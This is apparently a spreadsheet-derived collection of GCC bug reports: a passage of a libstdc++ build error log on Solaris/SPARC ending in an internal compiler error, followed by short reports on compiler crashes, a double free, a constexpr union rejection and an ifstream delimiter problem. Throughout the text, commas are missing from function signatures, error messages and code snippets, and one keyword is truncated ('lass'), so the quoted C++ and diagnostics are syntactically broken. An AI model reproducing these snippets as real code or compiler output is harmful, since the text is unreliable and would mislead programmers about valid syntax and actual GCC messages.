                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/complex:45
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ccomplex:38
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/include/precompiled/stdc++.h:52:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/stl_algobase.h:898:68: error: template definition of non-template 'static bool std::__lexicographical_compare::__lc(_II1 _II1 _II2 _II2)'
       __lc(_II1 __first1 _II1 __last1 _II2 __first2 _II2 __last2)
                                                                    ^
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ios:40:0
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/istream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/sstream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/complex:45
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ccomplex:38
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/include/precompiled/stdc++.h:52:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/char_traits.h:145:74: error: template definition of non-template 'static int __gnu_cxx::char_traits::compare(const char_type* const char_type* std::size_t)'
     compare(const char_type* __s1 const char_type* __s2 std::size_t __n)
                                                                          ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/char_traits.h:158:32: error: template definition of non-template 'static std::size_t __gnu_cxx::char_traits::length(const char_type*)'
     length(const char_type* __p)
                                ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/char_traits.h:169:69: error: template definition of non-template 'static const char_type* __gnu_cxx::char_traits::find(const char_type* std::size_t const char_type&amp;)'
     find(const char_type* __s std::size_t __n const char_type&amp; __a)
                                                                     ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/char_traits.h:180:65: error: template definition of non-template 'static __gnu_cxx::char_traits::char_type* __gnu_cxx::char_traits::move(__gnu_cxx::char_traits::char_type* const char_type* std::size_t)'
     move(char_type* __s1 const char_type* __s2 std::size_t __n)
                                                                 ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/char_traits.h:189:65: error: template definition of non-template 'static __gnu_cxx::char_traits::char_type* __gnu_cxx::char_traits::copy(__gnu_cxx::char_traits::char_type* const char_type* std::size_t)'
     copy(char_type* __s1 const char_type* __s2 std::size_t __n)
                                                                 ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/char_traits.h:199:58: error: template definition of non-template 'static __gnu_cxx::char_traits::char_type* __gnu_cxx::char_traits::assign(__gnu_cxx::char_traits::char_type* std::size_t __gnu_cxx::char_traits::char_type)'
     assign(char_type* __s std::size_t __n char_type __a)
                                                          ^
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/cassert:43:0
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/include/precompiled/stdc++.h:33:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:59:29: error: template definition of non-template 'void std::__cxx11::basic_string::swap(std::__cxx11::basic_string&amp;)'
     swap(basic_string&amp; __s) _GLIBCXX_NOEXCEPT
                             ^
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/string:53:0
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_classes.h:40
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/ios_base.h:41
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ios:42
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/istream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/sstream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/complex:45
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ccomplex:38
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/include/precompiled/stdc++.h:52:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:133:62: error: template definition of non-template 'std::__cxx11::basic_string::pointer std::__cxx11::basic_string::_M_create(std::__cxx11::basic_string::size_type&amp; std::__cxx11::basic_string::size_type)'
     _M_create(size_type&amp; __capacity size_type __old_capacity)
                                                              ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:165:29: error: template definition of non-template 'void std::__cxx11::basic_string::_M_construct(_InIterator _InIterator std::input_iterator_tag)'
      std::input_iterator_tag)
                             ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:208:31: error: template definition of non-template 'void std::__cxx11::basic_string::_M_construct(_InIterator _InIterator std::forward_iterator_tag)'
      std::forward_iterator_tag)
                               ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:238:43: error: template definition of non-template 'void std::__cxx11::basic_string::_M_construct(std::__cxx11::basic_string::size_type _CharT)'
     _M_construct(size_type __n _CharT __c)
                                           ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:255:40: error: template definition of non-template 'void std::__cxx11::basic_string::_M_assign(const std::__cxx11::basic_string&amp;)'
     _M_assign(const basic_string&amp; __str)
                                        ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:281:28: error: template definition of non-template 'void std::__cxx11::basic_string::reserve(std::__cxx11::basic_string::size_type)'
     reserve(size_type __res)
                            ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:312:24: error: template definition of non-template 'void std::__cxx11::basic_string::_M_mutate(std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type const _CharT* std::__cxx11::basic_string::size_type)'
        size_type __len2)
                        ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:335:44: error: template definition of non-template 'void std::__cxx11::basic_string::_M_erase(std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type)'
     _M_erase(size_type __pos size_type __n)
                                            ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:348:37: error: template definition of non-template 'void std::__cxx11::basic_string::resize(std::__cxx11::basic_string::size_type _CharT)'
     resize(size_type __n _CharT __c)
                                     ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:360:47: error: template definition of non-template 'std::__cxx11::basic_string&amp; std::__cxx11::basic_string::_M_append(const _CharT* std::__cxx11::basic_string::size_type)'
     _M_append(const _CharT* __s size_type __n)
                                               ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:382:23: error: template definition of non-template 'std::__cxx11::basic_string&amp; std::__cxx11::basic_string::_M_replace_dispatch(std::__cxx11::basic_string::const_iterator std::__cxx11::basic_string::const_iterator _InputIterator _InputIterator std::__false_type)'
      std::__false_type)
                       ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:394:16: error: template definition of non-template 'std::__cxx11::basic_string&amp; std::__cxx11::basic_string::_M_replace_aux(std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type _CharT)'
      _CharT __c)
                ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:423:31: error: template definition of non-template 'std::__cxx11::basic_string&amp; std::__cxx11::basic_string::_M_replace(std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type const _CharT* std::__cxx11::basic_string::size_type)'
         const size_type __len2)
                               ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:475:55: error: template definition of non-template 'std::__cxx11::basic_string::size_type std::__cxx11::basic_string::copy(_CharT* std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type) const'
     copy(_CharT* __s size_type __n size_type __pos) const
                                                       ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:1178:61: error: template definition of non-template 'std::__cxx11::basic_string::size_type std::__cxx11::basic_string::find(const _CharT* std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type) const'
     find(const _CharT* __s size_type __pos size_type __n) const
                                                             ^
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/cassert:43:0
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/include/precompiled/stdc++.h:33:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:1201:45: error: template definition of non-template 'std::__cxx11::basic_string::size_type std::__cxx11::basic_string::find(_CharT std::__cxx11::basic_string::size_type) const'
     find(_CharT __c size_type __pos) const _GLIBCXX_NOEXCEPT
                                             ^
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/string:53:0
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_classes.h:40
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/ios_base.h:41
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ios:42
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/istream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/sstream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/complex:45
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ccomplex:38
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/include/precompiled/stdc++.h:52:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:1219:62: error: template definition of non-template 'std::__cxx11::basic_string::size_type std::__cxx11::basic_string::rfind(const _CharT* std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type) const'
     rfind(const _CharT* __s size_type __pos size_type __n) const
                                                              ^
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/cassert:43:0
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/include/precompiled/stdc++.h:33:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:1240:46: error: template definition of non-template 'std::__cxx11::basic_string::size_type std::__cxx11::basic_string::rfind(_CharT std::__cxx11::basic_string::size_type) const'
     rfind(_CharT __c size_type __pos) const _GLIBCXX_NOEXCEPT
                                              ^
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/string:53:0
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_classes.h:40
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/ios_base.h:41
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ios:42
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/istream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/sstream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/complex:45
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ccomplex:38
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/include/precompiled/stdc++.h:52:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:1257:70: error: template definition of non-template 'std::__cxx11::basic_string::size_type std::__cxx11::basic_string::find_first_of(const _CharT* std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type) const'
     find_first_of(const _CharT* __s size_type __pos size_type __n) const
                                                                      ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:1272:69: error: template definition of non-template 'std::__cxx11::basic_string::size_type std::__cxx11::basic_string::find_last_of(const _CharT* std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type) const'
     find_last_of(const _CharT* __s size_type __pos size_type __n) const
                                                                     ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:1293:74: error: template definition of non-template 'std::__cxx11::basic_string::size_type std::__cxx11::basic_string::find_first_not_of(const _CharT* std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type) const'
     find_first_not_of(const _CharT* __s size_type __pos size_type __n) const
                                                                          ^
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/cassert:43:0
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/include/precompiled/stdc++.h:33:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:1305:58: error: template definition of non-template 'std::__cxx11::basic_string::size_type std::__cxx11::basic_string::find_first_not_of(_CharT std::__cxx11::basic_string::size_type) const'
     find_first_not_of(_CharT __c size_type __pos) const _GLIBCXX_NOEXCEPT
                                                          ^
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/string:53:0
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_classes.h:40
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/ios_base.h:41
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ios:42
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/istream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/sstream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/complex:45
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ccomplex:38
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/include/precompiled/stdc++.h:52:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:1316:73: error: template definition of non-template 'std::__cxx11::basic_string::size_type std::__cxx11::basic_string::find_last_not_of(const _CharT* std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type) const'
     find_last_not_of(const _CharT* __s size_type __pos size_type __n) const
                                                                         ^
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/cassert:43:0
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/include/precompiled/stdc++.h:33:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:1337:57: error: template definition of non-template 'std::__cxx11::basic_string::size_type std::__cxx11::basic_string::find_last_not_of(_CharT std::__cxx11::basic_string::size_type) const'
     find_last_not_of(_CharT __c size_type __pos) const _GLIBCXX_NOEXCEPT
                                                         ^
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/string:53:0
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_classes.h:40
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/ios_base.h:41
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ios:42
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/istream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/sstream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/complex:45
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ccomplex:38
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/include/precompiled/stdc++.h:52:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:1357:72: error: template definition of non-template 'int std::__cxx11::basic_string::compare(std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type const std::__cxx11::basic_string&amp;) const'
     compare(size_type __pos size_type __n const basic_string&amp; __str) const
                                                                        ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:1373:40: error: template definition of non-template 'int std::__cxx11::basic_string::compare(std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type const std::__cxx11::basic_string&amp; std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type) const'
      size_type __pos2 size_type __n2) const
                                        ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:1390:32: error: template definition of non-template 'int std::__cxx11::basic_string::compare(const _CharT*) const'
     compare(const _CharT* __s) const
                                ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:1405:65: error: template definition of non-template 'int std::__cxx11::basic_string::compare(std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type const _CharT*) const'
     compare(size_type __pos size_type __n1 const _CharT* __s) const
                                                                 ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/basic_string.tcc:1422:22: error: template definition of non-template 'int std::__cxx11::basic_string::compare(std::__cxx11::basic_string::size_type std::__cxx11::basic_string::size_type const _CharT* std::__cxx11::basic_string::size_type) const'
      size_type __n2) const
                      ^
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_classes.h:850:0
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/ios_base.h:41
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ios:42
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/istream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/sstream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/complex:45
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ccomplex:38
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/include/precompiled/stdc++.h:52:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_classes.tcc:45:46: error: template definition of non-template 'std::locale::locale(const std::locale&amp; _Facet*)'
     locale(const locale&amp; __other _Facet* __f)
                                              ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_classes.tcc:63:36: error: template definition of non-template 'std::locale std::locale::combine(const std::locale&amp;) const'
     combine(const locale&amp; __other) const
                                    ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_classes.tcc:82:60: error: template definition of non-template 'bool std::locale::operator()(const std::__cxx11::basic_string&amp; const std::__cxx11::basic_string&amp;) const'
         const basic_string&amp; __s2) const
                                                            ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_classes.tcc:149:76: error: template definition of non-template 'int std::__cxx11::collate::_M_compare(const _CharT* const _CharT*) const'
     collate::_M_compare(const _CharT* const _CharT*) const throw ()
                                                                            ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_classes.tcc:155:80: error: template definition of non-template 'std::size_t std::__cxx11::collate::_M_transform(_CharT* const _CharT* std::size_t) const'
     collate::_M_transform(_CharT* const _CharT* size_t) const throw ()
                                                                                ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_classes.tcc:162:51: error: template definition of non-template 'virtual int std::__cxx11::collate::do_compare(const _CharT* const _CharT* const _CharT* const _CharT*) const'
         const _CharT* __lo2 const _CharT* __hi2) const
                                                   ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_classes.tcc:200:58: error: template definition of non-template 'virtual std::__cxx11::collate::string_type std::__cxx11::collate::do_transform(const _CharT* const _CharT*) const'
     do_transform(const _CharT* __lo const _CharT* __hi) const
                                                          ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/locale_classes.tcc:256:53: error: template definition of non-template 'virtual long int std::__cxx11::collate::do_hash(const _CharT* const _CharT*) const'
     do_hash(const _CharT* __lo const _CharT* __hi) const
                                                     ^
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ios:43:0
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/istream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/sstream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/complex:45
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ccomplex:38
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/include/precompiled/stdc++.h:52:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/streambuf:827:43: error: template definition of non-template 'std::basic_streambuf::basic_streambuf(const std::basic_streambuf&amp;)'
     basic_streambuf(const basic_streambuf
                                           ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/streambuf:832:37: error: template definition of non-template 'std::basic_streambuf&amp; std::basic_streambuf::operator=(const std::basic_streambuf&amp;)'
     operator=(const basic_streambuf
                                     ^
In file included from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/streambuf:850:0
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ios:43
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/istream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/sstream:38
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/complex:45
                 from /var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/ccomplex:38
                 from /vol/gcc/src/hg/trunk/local/libstdc++-v3/include/precompiled/stdc++.h:52:
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/streambuf.tcc:46:42: error: template definition of non-template 'virtual std::streamsize std::basic_streambuf::xsgetn(std::basic_streambuf::char_type* std::streamsize)'
     xsgetn(char_type* __s streamsize __n)
                                          ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/streambuf.tcc:80:48: error: template definition of non-template 'virtual std::streamsize std::basic_streambuf::xsputn(const char_type* std::streamsize)'
     xsputn(const char_type* __s streamsize __n)
                                                ^
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/streambuf.tcc: In instantiation of 'class std::basic_streambuf':
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/streambuf.tcc:149:25:   required from here
/var/gcc/regression/trunk/11-gcc/build/sparc-sun-solaris2.11/libstdc++-v3/include/bits/streambuf.tcc:45:5: internal compiler error: in tsubst_decl at cp/pt.c:11516
     basic_streambuf::
     ^
This seems to be a miscompilation and Solaris/x86 bootstrap is fine from the
same tree.  I'm now starting a reghunt.
  Rainer</t>
  </si>
  <si>
    <t>GCC-826</t>
  </si>
  <si>
    <t>g++ ICEs on static class member with the same type as its class</t>
  </si>
  <si>
    <t>See http://gcc.gnu.org/ml/gcc-patches/2000-11/msg00086.html
Release:
g++ 2.97 20001116
Environment:
i386-*-linux
How-To-Repeat:
g++ g++.old-deja/g++.other/crash34.C</t>
  </si>
  <si>
    <t>GCC-63280</t>
  </si>
  <si>
    <t>[5 Regression] Double free in GCC compiled with LTO and -O3.</t>
  </si>
  <si>
    <t>GCC 5.0.0 20140914 (experimental) /r215254/. Crash at bootstrap.
0x8a6117d crash_signal
        ../../gcc-5/gcc/toplev.c:340
0x8642460 free_register_move_costs
        ../../gcc-5/gcc/ira.c:1694
0x8642460 target_ira_int::~target_ira_int()
        ../../gcc-5/gcc/ira.c:1708
0x8642460 __base_dtor
        ../../gcc-5/gcc/target-globals.c:124
Backtraces:
#0  0xb7e2a060 in free () from /usr/lib/libc.so.6
#1  0x08415067 in free_register_move_costs (
    this=0x9259640 ) at ../../gcc-5/gcc/ira.c:1694
#2  target_ira_int::~target_ira_int (this=0x9259640 )
    at ../../gcc-5/gcc/ira.c:1708
#3  0xb7de3073 in __run_exit_handlers () from /usr/lib/libc.so.6
#4  0xb7de30d1 in exit () from /usr/lib/libc.so.6
#0  0xb7e2a060 in free () from /usr/lib/libc.so.6
#1  0x08642461 in free_register_move_costs (
    this=0x9259640 ) at ../../gcc-5/gcc/ira.c:1694
#2  __base_dtor (this=0x9259640 )
    at ../../gcc-5/gcc/ira.c:1708
#3  target_globals::__base_dtor (this=0x91e7480 )
    at ../../gcc-5/gcc/target-globals.c:124
#4  0xb7de3073 in __run_exit_handlers () from /usr/lib/libc.so.6
#5  0xb7de30d1 in exit () from /usr/lib/libc.so.6
In gcc/ira.c calls to memset are optimized out:
1699	  memset (x_ira_register_move_cost 0 sizeof x_ira_register_move_cost)
1700	  memset (x_ira_may_move_in_cost 0 sizeof x_ira_may_move_in_cost)
1701	  memset (x_ira_may_move_out_cost 0 sizeof x_ira_may_move_out_cost)</t>
  </si>
  <si>
    <t>GCC-71988</t>
  </si>
  <si>
    <t>[7 Regression] ICE in dump_simple_decl (gcc/cp/error.c:965)</t>
  </si>
  <si>
    <t>Hello.
Starting from r238558 we ICE in the following command:
$ g++ -fdump-ipa-cgraph tc.ii
c1plus: internal compiler error: Segmentation fault
0x115f024 crash_signal
	../../gcc/toplev.c:335
0x92d8c1 dump_simple_decl
	../../gcc/cp/error.c:965
0x92e4f2 dump_decl
	../../gcc/cp/error.c:1071
0x937289 decl_as_string(tree_node* int)
	../../gcc/cp/error.c:2880
0x937361 lang_decl_name(tree_node* int bool)
	../../gcc/cp/error.c:2914
0xa38962 cxx_printable_name_internal
	../../gcc/cp/tree.c:2165
0xa38ba9 cxx_printable_name(tree_node* int)
	../../gcc/cp/tree.c:2201
0xc0a369 symtab_node::name() const
	../../gcc/symtab.c:523
0xc0a268 symtab_node::asm_name() const
	../../gcc/symtab.c:507
0xc278eb analyze_functions
	../../gcc/cgraphunit.c:1044
0xc2c2c6 symbol_table::finalize_compilation_unit()
	../../gcc/cgraphunit.c:2545
where
$ cat tc.ii
struct A
{
} constexpr a</t>
  </si>
  <si>
    <t>GCC-54922</t>
  </si>
  <si>
    <t>[C++11][DR 1359] constexpr constructors require initialization of all union members</t>
  </si>
  <si>
    <t>gcc 4.8.0 20120930 (experimental) compiled with the flags
-Wall -pedantic -std=c++11
rejects the following code:
//----------------
lass nullable_int
{
  bool init_
  union {
    unsigned char for_value_init
    int value_
  }
public:
  constexpr nullable_int() : init_(false) for_value_init() {}
}
//----------------
main.cpp||In constructor 'constexpr nullable_int::nullable_int()':|
main.cpp|9|error: uninitialized member 'nullable_int::' in 'constexpr' constructor|
This prevents a very reasonable use-case namely the creation of a literal type that contains an anonymous union member.</t>
  </si>
  <si>
    <t>GCC-10074</t>
  </si>
  <si>
    <t>Delimeters in an ifstream ignored when reading a std::string</t>
  </si>
  <si>
    <t>As of gcc version 3.2.1 reading a std::string from an std::ifstream results in the entire file contents being read ignoring any delimiters in the file. This was not the behaviour of gcc 3.2 and prior.
Release:
3.2.1
